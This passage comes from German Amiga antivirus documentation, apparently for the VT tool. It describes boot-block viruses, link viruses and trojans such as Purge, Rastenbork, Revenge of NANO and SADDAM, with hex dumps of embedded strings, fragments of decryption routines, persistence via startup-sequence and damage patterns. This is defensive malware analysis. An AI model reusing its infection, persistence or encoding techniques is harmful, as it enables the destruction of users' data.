Block-Codier-Routine: nein Originalfunktion wird NICHT erfuellt. Meldet sich nach Vermehrung mit DisplayAlert und fordert zum Wechsel auf KS2.04 auf. Muesste also SOFORT auffallen. Im File ist zu lesen: 79006466 303a6c2f 6469736b 2d76616c y.df0:l/disk-val 69646174 6f720000 00281120 20202020 idator...(. 20202020 20202049 20616d20 74686520 I am the 4b69636b 73746172 7420322e 30202d20 Kickstart 2.0 - 50524f4d 4f544552 202d2056 69727573 PROMOTER - Virus - Pstats-Virus File Laenge ungepackt: 19784 Bytes GFA-Basic-Programm. Keine verbogenen Vektoren Zielgerichtet gegen PHOBOS. Ein Mailbox-Programm (kenne ich nicht). Bleibt nicht im Speicher. Von der Definition ein reines Zer- stoerungsprogramm und kein Virus, da keine Vermehrung. Also KEINE Gefahr fuer "normale" Amiga-User. Es wird nach einigen Filenamen gesucht und dann deren Inhalt mit Speichermuell ueberschrieben. S:PHOBOS.CONF NETZCONFIG BRETTERCONFIG USERCONFIG Einige der oben genannten Filenamen werden auch noch mit der Er- weiterung .TAPO, .BAK, .CONF1 usw. gesucht. Nach der Zerstoerungs- arbeit wird also das Mailboxsystem nicht mehr laufen. Empfehlung: loeschen Es gibt da nichts auszubauen, da das Virusteil IM GFA-Teil sitzt. Der Programmierer MUSS also den sourcecode von pstats besitzen. Zumindestens ist mir kein Recompiler fuer GFA-Basic bekannt. - Pseudoselfwriter andere Namen: Selfwriter, siehe bei Lamer - Purge-Inst. File Laenge gepackt: 9812 Bytes Laenge ungepackt: 14864 Bytes KEINE verbogenen Vektoren Original-Name des Files unbekannt. Duerfte in E geschrieben sein. Da keiner freiwillig so ein File startet, vermute ich dass das File in die startup-sequence einer Spiele-Disk oder so aehnlich eigebaut ist. Ablauf: Nach folgenden LWen wird gesucht: DH0, DH1, DH2, DH3, HD0, HD1, HD2, HD3, DF0, DF1, DF2, DF3, A und B. In das C-Verzeichnis und in das WBStartup-Verzeichnis (Falls vor- handen wird ein GEPACKTES File mit dem Namen Purge geschrieben. In die startup-sequence und in die User-Startup (falls vorhanden) wird die Zeile Run >NIL: Purge eingefuegt. Beim naechsten Reset wird also IMMER das Purge-Trojan-Teil aufge- rufen. - Purge-Trojan File Laenge gepackt: 5300 Bytes Laenge ungepackt: 14776 Bytes Das File liegt in C und/oder in WBStartup (s.0.) Ablauf: Nach Aufruf wird das Purge-Trojan-File ueberschrieben mit einem UNGEPACKTEN Purge-File, das nur noch 5212 Bytes lang ist. (Text- ausgabe). Danach begibt sich der Prozess in ein Delay : move.l #$7BC,D0 muls.w #$32,D0 (bei mir rund 33 Minuten) Sobald die Zeit abgelaufen ist, wird mit Dos-Befehlen (examine usw.) nach Icons gesucht. Diese Icons werden durch ein neues Icon (Laenge: 2164 Bytes) ersetzt. Dieser Vorgang MUESSTE normal auffallen. Probieren Sie einen Tastatur-Reset. Die Festplatte wird beim naechsten Aufruf wieder validiert. Ja man soll das nicht machen, aber es ist die einzige Moeglichkeit eines Abbruchs. Wenn Sie das Programm weiterarbeiten lassen, so erscheint danach fuer etwa eine Minute ein gadgetloses Fenster mit Text: Friend of Terminator is there !!! ANTIPIRAT Power of Destroying !!! My ultimate answer against all the fucking softwarepirats ! Hi Anatol,Cycledom,Primitive,Bj.rn,Dead Homer,Brian, Gigant,Termination 8,Hardball & Slimeck. Worked on all available devices...! Ready.... Schaeden: Wenn Sie nun das entsprechende Laufwerk oeffnen, werden Sie nur noch ein Icon sehen, da alle uebereinander liegen. Im Icon koen- nen Sie lesen: FUCKING SOFTWARE PIRAT Da das Icon vom Typ Project ist, koennen keine Programme mehr ueber Icon gestartet werden. VT2.68 sollte den Prozess finden und versucht ihn abzuschalten (GURU-Gefahr !!). VT2.68 sollte die drei Purge-File-Typen erkennen und bietet loeschen an. Das entstehende Purge-Icon sollte auch erkannt werden, aber der Versuch 100 Icons mit VT zu loeschen, ist zu langsam. Nehmen Sie hierfuer ein Directory-Tool. Die Programme auf meiner Test-Partition waren noch brauchbar, halt ohne Icon. - PVL.BB (L) Nach meiner Meinung NIE lauffaehig. Warum er dann doch hier steht. Weil dieser BB als Virus weitergegeben wird und damit die Erbsenzaehler eine Ruhe geben. Ich habe auf jeder Maschine nur den GURU gesehen und wenn man versucht den BB zu re- assemblieren, sieht man auch warum. Versucht durch Text zu taeuschen: 00261054 68697320 4469736b 20497320 .&.This Disk Is 6e6f7420 496e6665 63746564 20427920 not Infected By 416e7920 4b696e64 204f6620 56697275 Any Kind Of Viru 73204974 73204f6b 61792021 00010012 s Its Okay !.... 204c6566 74204d6f 75736542 7574746f Left MouseButto 6e3a2043 6f6e7469 6e756520 776f726b n: Continue work 202c2052 69676874 204d6f75 73654275 , Right MouseBu 74746f6e 3a204272 65616b20 20200000 tton: Break .. 00341054 68697320 6469736b 20697320 .4.This disk is 6f6b6179 20636f6e 74696e75 65207769 okay continue wi 74682079 6f757220 776f726b 696e6720 th your working 20200001 0012204c 65667420 4d6f7573 .... Left Mous 65427574 746f6e3a 20436f6e 74696e75 eButton: Continu 6520776f 726b202c 20526967 6874204d e work , Right M 6f757365 42757474 6f6e3a20 42726561 ouseButton: Brea 6b202020 0000ffff ffffffff ffffffff k ............ - QRDL V1.1 Link verlaengert ein File um 2320 Bytes Vermehrung nur gelungen mit KS1.3 und Chip 512 kein Fastmem KS37.300 (A600) : immer GURU 3 Haengt sich als 1.Hunk (neuer) ein. Zuerst gefunden an: PPLoadSeg Laenge verseucht: 3484 Bytes Namensbegruendung: nach eor.b d5,(a0)+ ist im Speicher zu lesen: 00000000 28432931 3939322D 30342D31 ....(C)1992-04-1 36205152 444C2E20 52656C65 61736520 6 QRDL. Release 312E3120 426F726E 20696E20 506F6C61 1.1 Born in Pola 6E642C20 47727420 746F204A 61636B20 nd, Grt to Jack Verbogene Vektoren je nach Aktivierungsstand: Cool, DoIo, NewOpenLib, OpenWindow, $78(a6)->, Schaden A: Sucht den BitMapBlock einer Disk und gibt alle Bloecke frei. Fehler konnte erzeugt werden. Schaden B: Linkt sich an das erste File der startup-sequence. Mit KS1.3 (s.o.) gelungen Speichererkennung getestet: 20.11.92 Fileerkennung und Ausbau getestet: 20.11.92 Hinweis: Sie muessen auf Aufforderung PPLOADSeg loeschen, sonst besteht die Gefahr, dass VT den QRDL im Speicher uebersieht. Ich wiederhole mich ungern, aber noch einmal: Fuer einen sinnvollen Filetest mit VT MUSS!!!! der Speicher sauber sein. Dies gilt nicht nur fuer QRDL, sondern allge- mein. - RAF-Virus BB WARHAWK-Clone s.u. Nur Text geaendert. Eine Meisterleistung Im BB ist zu lesen: 4b54494f 4e2e2020 20204120 56495255 KTION. A VIRU 53204120 44415920 4b454550 53205448 S A DAY KEEPS TH 4520424f 4f54424c 4f434b53 20415741 E BOOTBLOCKS AWA 59212121 21212120 20205241 46002c28 Y!!!!!! RAF.,( Hinweis: Das Programm sichert den Bereich ab $7E600 NICHT. D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle geladen werden. Da der verbogene Coolzeiger in der Exec liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus- gabe "unbekanntes Prg" kommen. Mit 5 MB wurde dieses Virusteil im Speicher richtig erkannt, aber natuerlich bleibt unter KS1.3 bei dieser Speichergroesse, nach einem RESET das Prg. nicht er- halten und eine Vermehrung ist ueber DoIo nicht moeglich. - Random Access CopperIntro schreibt GURU nach $60, nicht resident, keine Vermehrung Empfehlung: sofort loeschen von der Definition KEIN Virus, aber schaedlich wg. $60 - Rastenbork-Inst. File Laenge gepackt: 5220 Bytes Laenge ungepackt: 8640 Bytes KEINE verbogenen Vektoren Sofort Loeschen Erlaubt das Anlegen von zwei BB-Viren (s.u.) Im File ist zu lesen: 54684520 72415354 656e624f 726b2069 ThE rASTenbOrk i 4e735441 6c6c6572 20627920 50655065 NsTAller by PePe 2f745253 69005669 72757349 6e666f00 /tRSi.VirusInfo. - Rastenbork-Virus BB Typ A: (Rastenborg) Version: 1.2 Verbogene Vektoren: Cool, DoIo Resetfest. Fordert trackdisk.device NICHT . Im BB ist zur Taeuschung uncodiert zu lesen: 69627261 72790042 6f6f7420 56697275 ibrary.Boot Viru 73205072 6f746563 746f7220 76352e34 s Protector v5.4 00566563 746f7273 2077726f 6e672100 .Vectors wrong!. 426f6f74 20636f6e 7461696e 73205343 Boot contains SC 4120286f 72207369 6d696c61 72292076 A (or similar) v 69727573 20210043 6f6c6400 436f6f6c irus !.Cold.Cool 00446f49 4f206368 616e6765 64210041 .DoIO changed!.A 204e5053 2070726f 64756374 696f6e2e NPS production. Schaeden: a) Vermehrt sich ueber BB. b) Sobald eine Zaehlzelle den Wert $B erreicht hat, wird ein Block mit Muell gefuellt. Der Block ist NICHT zu retten. Versuchen Sie mit DiskSalv2 etwas zu retten. Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert und mit DisplayAlert ausgegeben: Meet your new friend,The Rastenborg Virus v1.2 Congratulations! Disk in drive is unprotected. It probably has no more root block,but who cares... ALL thanksgiving services please send to PePe/?"??????? Poland,Ketrzyn,1994.04.08 . Hinweis: Der Programmierer schreibt hier Rastenborg, also "g". Typ B: (rAStENboRk) Version: 2.0 Verbogene Vektoren: Cool, DoIo Resetfest. Fordert trackdisk.device NICHT . Im BB ist zur Taeuschung uncodiert zu lesen: 50616e7a 65722074 6f74616c 20616e74 Panzer total ant 69207669 72757320 73797374 656d0056 i virus system.V 69727573 20646573 74726f79 65642100 irus destroyed!. Schaeden: a) Vermehrt sich ueber BB. b) Sobald eine Zaehlzelle den Wert $B erreicht hat, soll mit add.b #7 ein Bereich ab $6E000 auf einer Laenge von $6400 veraendert werden. $6E000 ist nur bei einer DD-Disk der Root-Zylinder. Vorher Block: 880 0000: 00000002 00000000 00000000 00000048 ...............H 0010: 00000000 1d397726 00000000 00000000 .....9w&........ usw. Nachher Block: 880 0000: 07070709 07070707 07070707 0707074f ...............O 0010: 07070707 24407e2d 07070707 07070707 ....$@~-........ usw. Dieser Bereich koennte also "rueck-codiert" werden. Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert und mit DisplayAlert ausgegeben: rAStENboRk cAShEr vIRUs v2.0 ...another Christmas`94 present! Your disk isn't damaged,but it has just been coded. Try to find coding routine. If got any problems,contact Santa Claus or just PePe/tRSi Bonus disks are welcome! Der Programmierer schreibt hier Rastenbork, also "k". Hinweis 2: Falls in VT-RootBlock "von rAStENboRk cod." ange- zeigt wird brechen Sie bitte ab. Gehen Sie in VT-Prefs und schalten Sie den Sicherheitsrequester ab. Testen Sie dann die Disk mit BlockItest. Von Block 880-929 wird Ihnen dann Decode angeboten. (Ja das dauert, aber eine unwichtige Disk koennen Sie auch gleich neu formatieren.) VT wird den BitMap- Block der wahrscheinlich auch im codierten Bereich liegt, NICHT finden. Sobald der BlockITest fertig ist, entnehmen Sie die Disk fuer kurze Zeit. Beim Neueinlegen sollte der BitMap- Block vom Betriebssystem in Ordnung gebracht werden, hoffe ich. Diese Disk sollten Sie noch einmal allen Tests unterziehen. Auch BlockKette !!!! Hinweis 3: Bei einigen Versuchen wurde nicht nur der Rootbereich codiert, sondern auch auch der BB mit Muell gefuellt. Spielen Sie bitte in so einem Fall ZUERST mit VT einen DOS0-BB auf die Disk. Danke - RDB Formatter 2 Virus Mit diesem Namen erkennt ein anderes Antivirusprogramm Files, die vom GlobVec144-LVirus veraendert wurden. NUR !!!! Der GlobVec144-LVirus enthaelt KEINE Rigid-Format-Routine !!!!! siehe bei GlobVec144-LVirus Stand: 97-03-28 - Red October V1.7 Link Name im Prg nicht nachvollziehbar auch KS2.04, Laenge Ursprungsfile ungepackt: 1296 Bytes keine verbogenen Vektoren, schnelle Vermehrung (20min eine Disk komplett verseucht). Haengt sich vor den ersten Hunk und verlaengert das File um 1296 Bytes. In einem verseuchten File ist um $500 zu lesen: timer.device, dos.library, ram: ram:1 . Virus meldet sich NIE. Manche verseuchten Files ver- suchten zwar noch erfolgreich eine Vermehrung, aber bei Aus- fuehrung des eigentlichen Prg.s GURU. VT versucht auch diese Files retten. Schaeden in Abhaengigkeit von der Computer-Systemzeit: Computer-Sekunden teilbar durch 3 = Vermehrungsversuch Computer-Sekunden teilbar durch 16 = RESET Vermehrungsbedingungen: - nur bei Aufruf eines verseuchten Files - sucht mit lock, info, examine, exnext andere Files - testet auf Schreibschutz (#80) - File ausfuehrbar ($3F3) - File kleiner #50000 - File noch nicht befallen - KEIN Test auf Disk voll VT-Test: 27.03.92 Ursprungsfile wird geloescht (da gibt es nichts auszubauen). Aus verseuchten Files (auch GURU-Files s.o.) wird Link aus- gebaut. ALLE Files waren wieder im Originalzustand und voll lauffaehig. - RedGhost-AV (L) BB s.u. bei Antivirus-BB - Registrator-Virus File s.o. bei AeReg.BBS-Trojan - Rel 01.28 Virus File s.o. DOOR_BELLS-Virus - Rene siehe bei Lamer da im entschluesselten Programm The LAMER Ex... zu lesen ist und das Verhalten einem Lamervirus entspricht, halte ich eine Zuordnung zur Lamer-Gruppe fuer richtig. - ReOrgIt-Troj. (Zerstoerung) Archivname: REORGIT.LHA L: 52279 Bytes Filename: ReOrgIt.exe L: 60732 Bytes Fundort (inzwischen geloescht) : Aminet/util/wb Ein AMOS-Programm Im File ist zu lesen: 68652e2e 2e000002 733a0010 73746172 he......s:..star 7475702d 73657175 656e6365 000c5573 tup-sequence..Us 65722d73 74617274 75700003 2a2e2a00 er-startup..*.*. 000c4e6f 77207265 6f726769 6e670008 ..Now reorging.. 4861636b 46696c65 001a4841 48414841 HackFile..HAHAHA 2c20796f 75722048 44206973 20737475 , your HD is stu 66666564 00125375 636b6564 20696e20 ffed..Sucked in 61727365 686f6c65 00124561 74207368 arsehole..Eat sh 69742064 69636b20 68656164 000e5072 it dick head..Pr 65706172 6520746f 20444945 000b416c epare to DIE..Al 6c20446f 6e652e2e 2e000000 l Done...... Schaden: Loescht s:startup-sequence und s:User-startup Soll loeschen: s:*.* (bei mir nicht) VT bietet Loeschen an. - REP-Virus SCA-Clone nur Text geaendert 32165468 65204d65 67612d4d 69676874 2.The Mega-Might 79205245 50202121 dc6e0000 4ef90000 y REP !!.n..N... 00004121 52455021 52455021 52455021 ..A!REP!REP!REP! - Return Of The Lamer PrgFileVirus Laenge 1848 Bytes tarnt sich als Disk-Validator KickTag, KickCheckSum, BeginIo und andere zu erkennen an: hat im Gegensatz zum Orig.Disk-Validator keinen lesbaren ASCII-Text Schaeden in Abhaengigkeit von der Zeit: a) bestimmt eine Blocknummer ueber $DFF007 und schreibt 64 x LAMER!!! hinein b) Fastformatroutine fuer alle Laufwerke und ueber DisplayAlert Textausgabe: The Return Of The Lamer Exterminator c) schreibt den falschen Disk-Validator auf Disk - Revenge Bootloader! Begin, KickTag, KickCheckSum, Vec5 Fastmem: nein Vermehrung ueber BB - Revenge V1.2 cool,doio,vec5 , im Speicher immer $7e000 und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste) Vermehrung: ueber BB Schaden: nach einger Zeit neuer Mauszeiger im BB sichtbar: Revenge V1.2GCount: - Revenge of NANO Typ A Virus File Laenge: 1412 Bytes Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis. Verbogene Vektoren: Cool, OldOpenLib Die startup-sequence wird IMMER 3008 Bytes lang. Probleme deshalb siehe bei Typ B Im File ist zu lesen: 61727900 000151f0 00000000 3aa0a000 ary...Q.....:... ^^^^^^ 3a732f73 74617274 75702d73 65717565 :s/startup-seque 6e636500 a0a00a0a 49206861 74652043 nce.....I hate C 6f6d6d6f 646f7265 20212121 00005265 ommodore !!!..Re 76656e67 65206f66 204e414e 4f202121 venge of NANO !! 210000c8 0a2e2e2e 616e6f74 68657220 !.......another Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle: #50 = DisplayAlert #100 = SetWindowTitle - Revenge of NANO Typ B Virus File Laenge: 2400 Bytes Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis. Verbogene Vektoren: Cool, DoIo, $6c, open, Lock, Loadseg Openwindow Die startup-sequence wird IMMER 3008 Bytes lang. startup-sequence 0000: a0a00a0a 203b636c 730a0a00 00000000 .... ;cls....... ^^^^^^^^ ;unsichtbar immer 1. Zeile 0010: 00000000 00000000 00000000 00000000 ................ ;usw. Probleme dadurch: - auf der Disk war zuwenig Platz => Aerger - Die Ursprungs-startup war laenger. Der Rest wird einfach abgeschnitten. - Die Ursprungs-startup war kuerzer. Der Rest wird aufgefuellt. z.B. mit Nullen siehe oben Einige Editoren kommen mit so einem File nicht zurecht. Kopieren Sie das File in die RAM. Protect-Flags aendern sich. Loeschen Sie das File auf Disk. (nicht ueberschreiben!!) Loeschen Sie die erste Zeile ($A0A0,0a,0a). Kopieren Sie Sie das File von RAM nach DF0 . Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle (#50, #100, #150): 50: = DisplayAlert ...another masterpiece by N A N O !!! GREETINGS TO: 1 Byte Bandit, Byte Warrior,DEF JAM, DiskDoctors B FANTASY, Foundation For The Extermination Of Lamers, N I.R.Q. Team, Obelsik Softworks Crew, S.C.A., UNIT A ... 100: = aendere windowtitle und screentitle "I hate giants !!!",0 "Revenge of NANO !!!",0 150: Fenster oeffnen "CON:10/20/600/140/ some melancholics ...",0" " ",0a " The Life is beautiful !",0a " ",0a " The Life is awful !",0a " ",0a " The Life is a Fun !",0a " ",0a " The Life is a Pain !",0a " ",0a " But only the death is the way you should join in ! ",0a Fileauszug (Texte sind nicht codiert): 00003aa0 a0003a73 2f737461 72747570 ..:...:s/startup 2d736571 75656e63 6500a0a0 0a0a434f -sequence.....CO ;...... ^^^^^^^^^ 69616e74 73202121 21005265 76656e67 iants !!!.Reveng 65206f66 204e414e 4f202121 210000c8 e of NANO !!!... Hinweis 1: Vt versucht alle Vektoren zurueckzusetzen. Ueberlegen Sie aber bitte, ob Sie nicht doch zur Sicherheit einen KRESET durchfuehren. Die Vektoren sind in sich verschachtelt. Hinweis 2: Falls das Virusfile ueber die startup-sequence aktiviert wurde, so haengt ein Lock (202 Objekt in use). VT gibt dann beim Loesch- versuch einen DosError aus. Booten Sie bitte dann von einer sauberen Disk neu und loeschen Sie das unsichtbare File von Hand. Bitte vergessen Sie nicht, die startup-sequence zu aendern. - Revenge of the Lamer PrgFileVirus Laenge 4560 Bytes nur KRESET (Entschuldigung) es werden mir zuviele Zeiger verbogen (10!!) entschluesselt steht im Speicher: dos.library.graphics.library.intuition.library. trackdisk.device.DOS s/startup.sequence usw. Name:$A0A0A0A0A0 steht im Hauptverzeichnis und 1.Zeile Startup testet vor Vermehrung ob genuegend Platz auf Disk ist nach 6 Resets (denke ich), Formatieren aller eingelegten nicht schreibgeschuetzten Disks 3 Seiten Alert-Meldung - Revenge of the Lamer 2 PrgFileVirus Laenge 4448 Bytes einige Write-Test-Routinen fehlen, sonst wie Revenge of the Lamer W A R N U N G: es ist mir beim Testen gelungen, Revenge of the Lamer 1 u. 2 so zu vermehren, dass SID und andere Prg.e die 5 A0 n i c h t anzeigen. Mein FileRequester auch nicht. Das VirusPrg. wird aber a u c h bei diesen Disks aktiviert und vermehrt sich !!! Mit einem DiskMonitor kann das Prg. ge- funden werden. Bei meinem PrgTest erscheint dann: Rev. Lam. unsichtbar Dies ist kein Schwachsinn, sondern der Sachverhalt wurde von anderen Programmierern nach meiner Entdeckung gegengeprueft und eine Fehlfunktion bei ExNext KS1.3 entdeckt. Dieser Fehler ist bei KS2.0 behoben. (vgl. auch Fish 429 Dr.doc) - RIPPER Programcode = Northstar, nur anderer Text cool im Prg. DoIo immer ab $7ec00 Vermehrung: BB Text (auch im BB sichtbar):ATARI KILLS COMMODORE! RIP! RIP THE RIPPER usw. - Riska Forpib-Clone s.o. - Rob Northern File Laenge: 2616 BGS9 Clone s.o Rob Northern im File lesbar Anfaengeraenderung: !!!! testet immer noch auf TTV1 obwohl nicht mehr vorhanden schreibt nur 2608 Bytes zurueck (Geruechte behaupten, dies waere die Originallaenge von BGS9 ???) vergisst 3F3 zu schreiben d.h. ein vermehrtes Prg ist NICHT mehr lauffaehig d.h. die startup-sequence einer verseuchten Disk bricht ab VT findet weiterhin BGS9 im Speicher. Bei BlockKette wird Rob nicht gefunden, da 3F3 fehlt. Ausbau mit FileTest. Stand 14.03.92 - Rude Xerox = DIGITAL AGE = Forpib-Clone nur Text geaendert - SACHSEN VIRUS NO.1 Cool, immer ab $78000 fordert trackdisk.device BB-Teile codiert mit move.b #$70,d0 add.b d0,(a0)+ decodiert im Speicher: ** SACHSEN VIRUS NO.1 ** usw Vermehrung: BB sonst keine Schaeden und keine Meldung GURU-Gefahr: sobald das Virus im Speicher ist und ein RESET ausgefuehrt wird, wird CloseDevice verbogen. Mit FastMem ab $200000 dann GURU. - SACHSEN VIRUS NO.3 Cool, DoIo, Wait, immer ab $78000 belegt Block 0-3 (d.h. ein File ab Block 2 wird auch zerstoert. Fordert trackdisk.device NICHT (HD!!!!) Alle Texte codiert. Vermehrung: BootBlock 0 - 3 Schaeden: Schreibt nach Block 880 (Root bei Disk) neuen Disknamen SACHEN NO.3 ON DISK !!! Schreibt in Block (abhaengig von $DFF006) 64 x SACHSEN3 Sollte dieser Block in einem File liegen, so ist dieses File NICHT mehr zu retten. DisplayAlert und dann RESET SACHSEN VIRUS NO.3 in Generation : is running... (bei mir Generation 23) - SADDAM HUSSEIN Bootblockvirus (vgl. auch BlowJob) KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7f000 Taeuscht durch Text im Bootblock: A2000 MB Memory Controller V2 Vermehrung und Schaden: Bootblock Sobald die Zaehlzelle den Wert $7530 erreicht hat, wird ein Programmteil mit subi.b #$71,D0 entschluesselt und mit display- Alert der Text ausgegeben: TOO BAD BROTHER ... SADDAM HUSSEIN STRIKES BACK !!! THE ONLY ESCAPE IS TO TURN THE POWER OFF !!! - SADDAM-VIRUS Disk-Validator Laenge:1848 Bytes VT versucht die Disk-Validator-Files zu unterscheiden: - SADDAM - verwendet sub #2,d0 - verwendet IRAK (decodiert: SADDAM VIRUS) - verwendet 41fa000a - schreibt nach DF0 - schreibt nach DF1 - verwendet 41fa0010 - schreibt nach DF0 - schreibt nach DF1 - verwendet: 363636a0, a0a0a0a0, HARD, KICK, LAME, LOOM, RISC, IRAN NATO, 4711, AFFE - verwendet sub #3,d0 SADDAM ][ (decodiert auch so zu lesen) - verwendet IRAK - verwendet 1.29 - verwendet sub #2,d6 SADDAM 7 (decodiert auch so zu lesen) - andere - 1234 - LoopC. - RootFormat - in File - SnoopDos - zu langes File (14524) - ungewoehnliche Disk-Validator-Files (MUSS KEIN Virus sein !!!) - CD17BitD Disk2932 - CD17BitD Disk2936 - usw. KS2.04 und hoeher NEIN (Disk-Validator liegt da im ROM) Festplatte NEIN (es wird mit trackdisk.device gearbeitet) HINWEIS: wird manchmal von VirusX mit Australian Parasite verwechselt !!!! Das erste Virusprogramm, das mit 1 MB Chip, Kick1.3 und OHNE setpatch r einen Reset mit der Tastatur uebersteht !!!!!!!! Cold, BeginIo, Close im Trackdisk.device, Rasterstrahl $90(a6) im Prg. dann noch OpenWindow, InitResident, direkte Dos.lib-Ein- spruenge. entschluesselt im Speicher mit: eor.b d0,(a0)+ subq.l #2,d0 dbra d1,loop Zum Verschluesseln eines neuen SADDAM-Disk-Validators wird ein Wert aus $DFF007 in d0 abgelegt. Speicherlage: SysStkLower - veraenderter Wert aus $DFF007 - Virus- programmlaenge Name decodiert: " SADDAM VIRUS" Schaeden und Gefahren: Das Einlegen einer Disk mit ungueltiger BitMap genuegt, um SADDAM zu aktivieren !!!! abhaengig von der Zaehlzelle: KopfStep alle Laufwerke (Disk danach BAD) und DisplayAlert: SADDAM-VIRUS Ueberschreibt jeden echten Disk-Validator auf einer ungeschuetzten Disk !!!!! Falls auf einer Disk kein l-Dir vorhanden ist, wird es erstellt und dann der verseuchte Disk-Validator hineinkopiert. Noch KEIN anderes Virusprogramm hat Unterverzeichnisse angelegt !!!! Sucht ueber den FileHeaderBlock den ersten FileDataBlock und schreibt in T.DATA das LWort IRAK . Der Rest des FileDataBlocks wird mit eor.l d1,(a0)+ dbra d0,loop verschluesselt. Bei aktivem SADDAM-VIRUS wird statt IRAK der richtige Wert 8 angezeigt! (Taeuschung !! vgl. Lamergruppe, die sauberen BB vortaeuscht!) Schreibt manchmal in ROOT in $13c (=Zeiger auf BitMapBlock) den Wert Null. Mit Glueck finden Sie in $140 den Originalwert (abge- legt vom Virusprogramm) . Wenn Sie Pech haben, hat ein anderer Virusprogrammteil diese Stelle kurz danach auch auf Null gesetzt. Versuchen Sie dann mit einer Bootdisk den OriginalDisk-Validator zu starten oder versuchen Sie mit einem Disk-Monitor zu Fuss den BitMapBlock zu finden und wieder in $13c einzutragen. Oder lesen Sie BitMapTest.dok (11.07.91) Hinweis: Versuchen Sie bitte NICHT decode IRAK auf einem fms.device (Grund: phys. und logischer Block verschieden). Sie muessen IRAK auf einer Disk decodieren !!!!! Hinweis 2: Ich besitze inzwischen (21.10.91) einen SADDAM-Disk- Validator mit der Laenge: 1892 Bytes . Dieser Disk-Validator aktiviert sich trotz Null in $138 und $13c nicht, sondern der System-Requester erscheint !!!! Hinweis 3: Um IRAK-codierte Bloecke zu reparieren, verwenden Sie bitte BlockITest. Geht sehr schnell im Vergleich zum FileTest. Danke Hinweis 4 28.07.93 WICHTIG !!!!! Dieser Hinweis gilt NUR fuer KS1.3, da ab KS2.04 der Disk-Validator im ROM sitzt. Es handelt sich um ein "brutales" Vorgehen, das Sie nur als letzte Rettung verwenden sollten. Mir wurde eine Disk zugeschickt, die neben dem SADDAM-Disk-Vali- dator auch noch jede Menge bad-HeaderKey-Fehler hatte. Der Bitmapzeiger war noch in Ordnung !!! und es waren noch keine Files codiert. Unter KS2.04 konnte das Virus-File ohne Probleme geloescht wer- den. Aber mit KS1.3 gab es Probleme wegen der anderen Fehler. Gefundener und mehrmals wiederholter Weg: - Man braucht KS1.3 (und nur dann kann dieser Weg notwendig sein, zusaetzliche Fehler siehe oben) - Eine SCHREIBGESCHUETZTE Bootdisk mit sauberen Disk-Validator - Eine verseuchte Disk mit zusaetzlichen Fehlerquellen. Ablauf: Starten Sie VT Falls VT SADDAM im Speicher findet, loeschen. Dann RootblockTest - bei Bedarf Bitmapzeiger richten - Disk-Validator umbenennen in fal.DisV Dann BlockITest - sobald VT SADDAM findet - zeigen - loeschen (Frage nach Filetest ignorieren) Dann BB->File->BB - Laufwerk waehlen - L waehlen - fal.DiskV anklicken - Delete Falls jetzt groessere Fehler ausser SADDAM auf der Disk sind, erscheint ein GURU. (Hat nichts mit VT zu tun, sondern mit dem Betriebssystem) Falls nur ein LW, Disk entnehmen und von sauberer Disk neu booten. SADDAM-Disk einlegen Requester erscheint und verlangt Bootdisk (wg.Disk-Validator). Bootdisk einlegen und wieder entnehmen. SADDAM-Disk einlegen und warten bis Licht ausgeht. Original- Disk-Validator behebt Fehler. VT-Disk einlegen und VT starten. SADDAM-Disk einlegen mit BB->File->BB fal.DiskV loeschen. Geht jetzt OHNE GURU. Dieser Diskwechsel entfaellt bei 2 LWen. Legen Sie ihre Saubere Bootdisk in DF0 und die SADDAM-Disk in DF1 . Hinweis fuer Othmar: Die bad HeaderKey-Fehler werden behoben, wenn Sie jetzt alle Files von der ehemaligen SADDAM-Disk im Einzelfile-Copymodus (also copy df1: ram: all) ins RAM kopieren und dann wieder zurueck (copy ram: df1: all) . Nocheinmal !!! Dieser umstaendliche Weg war nur notwendig: - bei KS1.3 - wegen der bad HeaderKey-Fehler (die gleiche Disk OHNE bad HeaderKey war auch unter KS1.3 ohne Probleme zu bearbeiten. Also loesche SADDAM-Virus mit FileTest !!!) - SADDAM-Clones verwenden statt IRAK LAME, LOOM, RISC, a0a0a0a0, 363636a0 usw. Testen Sie mit BlockITest und verneinen Sie decode und schauen sich den Block an. Langwort 0 enthaelt das Erkennungslangwort. Decode in BlockITest sollte richtig arbeiten. Falls nein, rufen Sie mich bitte an. Danke - SADDAM-Clones Teil2: Es sind einige Clones (z.B. SADDAM 2 u. 4 (Name nicht nachvoll- ziehbar) ) aufgetaucht, die als Disk-Validator etwas anders codiert sind. Sind von VT aber schon (l:Disk-Validator) beim Filetest als falsch erkannt worden. Naja jetzt hab ich sie und konnte einen Test durchfuehren. Danke - SADDAM-7 Disk-Validator Vermehrung mit KS1.3 als Disk-Validator: ja Codiert die Files nicht, sondern zerstoert die Files, indem SADDAM7! hineingeschrieben wird. Diese Files sind NICHT zu retten. Beim 2. Versuch ein anderes File zu laden und damit zu zerstoeren, habe ich IMMER den GURU3 gesehen. Das Teil muesste sich also sehr schnell verraten. Block: 890 0000: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7! 0010: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7! 0020: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7! VT kann deshalb nur File loeschen anbieten. - SADDAM-File Laenge: 14524 Bytes NICHT lauffaehig Error 121 Grund: Hunklaengenangabe immer noch $1c5 . Sofort loeschen - SADDAM ][ Disk-Validator Laenge: 1848 Bytes Verhalten: s.o. Schreibt IRAK Aenderungen: Name: " SADDAM ][ " andere Decodierroutine: z.B. subq.l #3,d0 (Orig. subq.l #2,d0) Nachtrag 02.01.93: Clone aufgetaucht. Verwendet als Kennung 1.29 Nachtrag 15.04.93: Mir wurde ein SADDAM ][ zugeschickt, der sofort mit GURU bei Benutzung antwortet. Ein Anfaenger, wahr- scheinlich mit Monitor-Kenntnissen, hat genau in der Codier- Routine zugeschlagen. Mit diesem Teil ist KEINE Verseuchung moeglich. Loeschen Sie das Teil aus L: und kopieren Sie den Original-Disk-Validator neu. - SADDAM-Clone besondere Art Name geaendert in HARDEX VIRUS Soll statt IRAK HARD schreiben. Wie das 